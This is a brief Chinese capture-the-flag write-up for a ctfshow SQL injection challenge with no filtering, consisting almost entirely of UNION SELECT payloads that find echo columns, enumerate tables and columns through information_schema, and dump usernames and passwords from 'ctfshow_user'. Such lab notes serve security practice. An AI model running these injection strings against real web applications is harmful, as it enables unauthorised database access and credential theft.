1. 没有过滤,最基础的联合查询爆数据,这里只写payload了
    1. #判断回显位
    2. -1' union select 1,2,3--+
    4. #爆表
    5. -1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema=database()--+
    7. #爆列
    8. -1'  union select group_concat(column_name),2,3 from information_schema.columns where table_name='ctfshow_user'--+
    10. #爆数据
    11. -1'  union select id,username,password from ctfshow_user--+